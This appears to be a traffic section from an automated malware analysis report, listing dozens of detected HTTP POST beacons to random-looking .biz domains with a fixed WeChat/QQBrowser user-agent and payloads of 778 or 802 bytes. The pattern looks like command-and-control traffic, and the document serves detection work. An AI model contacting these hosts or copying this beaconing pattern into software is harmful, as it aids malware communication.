Source: global traffic	HTTP traffic detected: POST /sskdftgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gbgqeacfgvpvmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jwmuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ppwjrkubwfxcghyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qppgqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rydwrcfdefifnid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qeqkpadihkhxvp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wdbsliqsvat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lmgofko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /agrlsditgvrhbmam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dckvav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qqngegncolupvk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bioujqhkngbec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /eicbtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lglryrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jjeefsoqcwkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xebufengtanjkobx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qsjvwblhtwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rewibl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /up HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gpwbguwoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rcdfrlm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /iikfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wveptxshemmsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vdhidkscvohylymj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dvvwndpvxviw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /idodhoekyfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ayk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qpwpqegnfgthpmmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dlmic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xfhqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qucjoqpnqvmyats HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qega HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vkbkkro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ymbuxxmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jihtwudooa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sgnslm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mtec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ceqohx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jvioqipfomt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vgeign HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /woumhgcoto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mhcgmys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /crmhxhtb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /evwtpcketpnsmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /anbxlwnko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vfovcnyrge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tnuhincspou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ynmucsrhqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /stobttwvpufmox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hoftnxoehn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kifvxdykbnmyfcxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /twuuqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cjvae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jshlt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /eccfsowypckinddi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qpmofftfdba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hclqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
